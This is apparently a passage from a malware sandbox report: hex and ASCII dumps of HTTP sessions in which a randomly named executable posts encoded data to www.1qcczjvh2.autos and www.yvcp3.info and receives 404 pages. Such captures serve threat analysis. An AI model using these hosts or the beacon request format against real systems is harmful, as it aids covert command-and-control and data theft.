                              Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                              Dec 2, 2024 15:54:35.508445024 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                              Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                              Dec 2, 2024 15:54:35.508459091 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                              Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                              Dec 2, 2024 15:54:35.508543968 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                              Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                              Dec 2, 2024 15:54:35.508557081 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                              Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                              Dec 2, 2024 15:54:35.508569956 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
                              Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                              Dec 2, 2024 15:54:35.508589983 CET1236INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                              Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                              Dec 2, 2024 15:54:35.508770943 CET1236INData Raw: 36 52 76 59 75 2b 41 65 52 44 4e 67 75 7a 63 55 59 2f 4f 4a 76 2f 64 45 52 5a 32 35 75 42 41 72 6b 6d 6c 6e 45 61 36 66 47 39 46 53 4c 44 41 55 6c 66 4b 2b 39 58 72 66 50 44 41 78 70 4d 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e
                              Data Ascii: 6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllD
                              Dec 2, 2024 15:54:35.508783102 CET1169INData Raw: 30 65 69 6d 74 39 35 73 45 63 6d 51 4c 75 43 53 41 4b 5a 43 6e 69 76 30 4e 52 6e 76 68 53 49 38 62 64 67 35 32 67 67 59 4a 51 49 6f 70 74 79 30 34 64 68 4a 67 63 6a 49 75 59 36 6e 59 66 66 31 79 75 6b 6e 38 4d 78 6a 55 56 36 50 36 58 39 32 67 49
                              Data Ascii: 0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw4rs2E3Ue8tCr+AAGoEei3FcQ9i3xxR0WQC7CTxe27qzEY9S9BwHYAXwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5T
                              Dec 2, 2024 15:54:35.508795977 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                              Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.749875129.226.153.85805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:54:36.603183031 CET1836OUTPOST /od8t/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              Content-Length: 1251
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.1qcczjvh2.autos
                              Referer: http://www.1qcczjvh2.autos/od8t/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 4f 67 30 78 72 4a 30 70 69 2f 4c 32 72 50 38 4e 2f 37 43 47 38 76 76 4d 33 6a 78 37 30 46 68 42 66 6f 64 74 61 45 34 54 70 71 75 67 74 6d 64 59 6a 34 38 31 41 67 4e 73 6d 4f 72 48 73 34 4b 48 70 34 63 66 74 31 79 49 2b 43 33 46 31 44 44 37 74 65 43 64 72 73 33 43 41 4a 4c 4c 35 6f 69 46 45 6f 57 34 38 7a 7a 4a 4f 6e 73 71 39 66 4d 5a 2b 6a 37 31 59 52 61 32 69 33 35 42 38 6b 64 45 50 2f 56 69 4b 79 6a 46 51 5a 42 76 46 61 62 4a 4e 44 39 30 4d 2f 37 74 43 31 79 50 36 4d 50 63 47 6d 61 52 77 45 2b 39 47 57 65 72 6f 46 58 72 76 53 42 36 71 75 4f 36 55 75 2f 77 78 48 46 53 46 63 62 74 44 42 2f 5a 6a 6c 2b 54 7a 6a 41 7a 79 33 79 49 36 35 79 35 71 4f 77 43 43 6e 51 65 4d 76 4c 36 64 51 51 63 45 58 56 4a 33 59 6d 54 51 39 76 4e 73 6c 72 53 46 47 62 65 43 77 48 6d 6b 30 4f 47 6c 7a 6f 2b 61 68 53 6f 4d 41 59 47 76 6d 41 34 30 7a 66 30 47 43 61 50 58 34 75 63 35 56 79 4b 7a 72 79 69 70 79 4a 4d 6b 30 42 61 46 54 56 4d 6a 46 41 6a 55 41 58 75 77 6f [TRUNCATED]
                              Data Ascii: cNeT5P=eU4BQVoGQCnLMOg0xrJ0pi/L2rP8N/7CG8vvM3jx70FhBfodtaE4TpqugtmdYj481AgNsmOrHs4KHp4cft1yI+C3F1DD7teCdrs3CAJLL5oiFEoW48zzJOnsq9fMZ+j71YRa2i35B8kdEP/ViKyjFQZBvFabJND90M/7tC1yP6MPcGmaRwE+9GWeroFXrvSB6quO6Uu/wxHFSFcbtDB/Zjl+TzjAzy3yI65y5qOwCCnQeMvL6dQQcEXVJ3YmTQ9vNslrSFGbeCwHmk0OGlzo+ahSoMAYGvmA40zf0GCaPX4uc5VyKzryipyJMk0BaFTVMjFAjUAXuwo1KboOLnYIAH2EsCqZu4Pc+R7IsLubeoMzVg0p9D5CWDxxkWhGFWFnRtvWmQ/LwXZLv5ngjCPe8vTIy7vsVV04ewNTgedT6pt/u/s0GWzEBqe6Eu3YHNLxhv6Ytx4akEl2bFcBLOPuZG+9W+y4CsMSz1ZEWTy+UqWxBbYmfx3ZVPkLMSQhzCG1gzlO2dqvhVrgWhwNUHOL2aqOudH60qYIXsRSReWuNbzscSa6Wr3LieG0plUieQEdovCOHCpzONfiMvIrgZb3cr2eR1gL7aA7zp2IphYMrwiOwnZHnXGMkrCc6sSRYKcdqB1KdCz/IjSK3grAmSPuo4OnvRDd+09BmOsFxdqpG4daYlaQxQTmsJpJ0/ErUYPD4ZOwkcI885Nf2PiLhtHi6bbKUKVVwPrdiKpBmLvAsePqIh6+DnwIn9onLxUBHLXvDg/CTF1afl7f5uYi+duPnw0sZ1C3NWsYDV7uDKBJCUt9117X1bCtA2Grh2elXs+B1oyML1DMhQ67kpbJWtbv9WOC7vvRcKzDQLzTS1BOv2ZIjDUmQ4G4801xO4dIQMKAyvWMpfn/4vZUX+l6rUUAx+LtmKnQL1ZV61t6z/632lGruWvZLYk6oKlgihWpeWkryPOY9vn2oNn+CrMTRHRcAaYjjytIvZXXGI3G9yCXzyzQk [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.749883129.226.153.85805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:54:39.256793976 CET530OUTGET /od8t/?cNeT5P=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuAseiIzOw6dSVdaELJzAoH4UPHDMi9vPJYMLHkfbSf8iDlLYPpS7IMNNH&l0W=Yh8P HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.1qcczjvh2.autos
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:54:40.854240894 CET1236INHTTP/1.1 404 Not Found
                              Server: Tengine
                              Date: Mon, 02 Dec 2024 14:54:40 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 58288
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "67344967-e3b0"
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                              Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                              Dec 2, 2024 15:54:40.854384899 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                              Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                              Dec 2, 2024 15:54:40.854398966 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                              Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                              Dec 2, 2024 15:54:40.854412079 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                              Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                              Dec 2, 2024 15:54:40.854424953 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                              Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                              Dec 2, 2024 15:54:40.854438066 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
                              Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                              Dec 2, 2024 15:54:40.854464054 CET1236INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                              Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                              Dec 2, 2024 15:54:40.854484081 CET1236INData Raw: 36 52 76 59 75 2b 41 65 52 44 4e 67 75 7a 63 55 59 2f 4f 4a 76 2f 64 45 52 5a 32 35 75 42 41 72 6b 6d 6c 6e 45 61 36 66 47 39 46 53 4c 44 41 55 6c 66 4b 2b 39 58 72 66 50 44 41 78 70 4d 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e
                              Data Ascii: 6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllD
                              Dec 2, 2024 15:54:40.854499102 CET1169INData Raw: 30 65 69 6d 74 39 35 73 45 63 6d 51 4c 75 43 53 41 4b 5a 43 6e 69 76 30 4e 52 6e 76 68 53 49 38 62 64 67 35 32 67 67 59 4a 51 49 6f 70 74 79 30 34 64 68 4a 67 63 6a 49 75 59 36 6e 59 66 66 31 79 75 6b 6e 38 4d 78 6a 55 56 36 50 36 58 39 32 67 49
                              Data Ascii: 0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw4rs2E3Ue8tCr+AAGoEei3FcQ9i3xxR0WQC7CTxe27qzEY9S9BwHYAXwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5T
                              Dec 2, 2024 15:54:40.854959965 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                              Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj
                              Dec 2, 2024 15:54:40.974627972 CET1236INData Raw: 77 56 67 72 42 57 30 66 77 32 4d 4d 47 44 55 59 39 59 30 68 72 31 57 39 36 38 68 31 52 44 68 52 33 73 2f 72 2b 59 6a 58 5a 34 36 70 47 50 6d 64 48 76 55 72 6e 77 4c 48 32 55 76 6d 7a 6f 38 52 2f 6c 78 33 65 72 2f 4e 43 79 44 59 69 67 39 4d 42 6d
                              Data Ascii: wVgrBW0fw2MMGDUY9Y0hr1W968h1RDhR3s/r+YjXZ46pGPmdHvUrnwLH2Uvmzo8R/lx3er/NCyDYig9MBmCzmIejuNRhvd1gWCLkLO8iMYnW4evOfVXiQtrNDwA4FHcl69Uk0AAAIABJREFUcPygav4l90Ye3VJ7Ytsv2mp4YTgcy9eqAGBVnmSz2yvydqkZbgVTNH+vd/ZWQi0AoLHtuoLwLoA0yA7vNOQ3fSvkOJpvAMyBXOJ


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.74990147.254.140.255805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:54:47.180071115 CET788OUTPOST /i7qk/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.yvcp3.info
                              Connection: close
                              Content-Length: 219
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.yvcp3.info
                              Referer: http://www.yvcp3.info/i7qk/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 2f 33 72 2b 74 55 45 2f 76 53 4b 72 72 33 70 38 4b 45 48 6f 63 78 56 75 46 52 6c 48 4f 52 63 48 66 37 79 79 4f 6e 5a 71 48 6a 4c 77 4b 59 55 50 63 6a 68 7a 33 68 67 65 73 2f 64 78 59 6c 30 72 32 78 76 49 72 53 6a 4a 64 48 32 38 30 6b 62 6d 4a 37 35 47 62 57 70 73 4b 51 68 31 54 5a 65 6a 5a 56 4c 73 38 39 77 78 45 50 30 32 4d 30 4e 38 6f 31 58 72 63 6b 37 76 53 66 73 44 67 71 45 6c 34 48 58 34 78 33 50 4d 49 57 6d 45 61 30 4f 59 36 65 6e 6e 72 51 6f 76 69 2b 59 45 30 2b 54 50 44 6e 31 76 5a 37 63 65 57 68 74 37 42 30 46 33 64 54 6f 52 64 34 35 35 34 72 68 6e 74 69 68 2b 2b 51 34 52 57 36 4c 52 53 4c 6f 53 39 77 56 64 6f 77 3d 3d
                              Data Ascii: cNeT5P=/3r+tUE/vSKrr3p8KEHocxVuFRlHORcHf7yyOnZqHjLwKYUPcjhz3hges/dxYl0r2xvIrSjJdH280kbmJ75GbWpsKQh1TZejZVLs89wxEP02M0N8o1Xrck7vSfsDgqEl4HX4x3PMIWmEa0OY6ennrQovi+YE0+TPDn1vZ7ceWht7B0F3dToRd4554rhntih++Q4RW6LRSLoS9wVdow==
                              Dec 2, 2024 15:54:48.458658934 CET1236INHTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Mon, 02 Dec 2024 14:54:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Trace: 2BA2307CB09D5BCE513E9A111C4B077560E011CF4AD77CC8419F4FE01100
                              Set-Cookie: _csrf=3b4b0fde9b3dc4f4857cb02cd320607166595c4e6a98603cc9bf48ea1c75a3b6a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22usZSH9FSJfKQaAh0Zx-NRxrxSR5gpuhH%22%3B%7D; path=/; HttpOnly
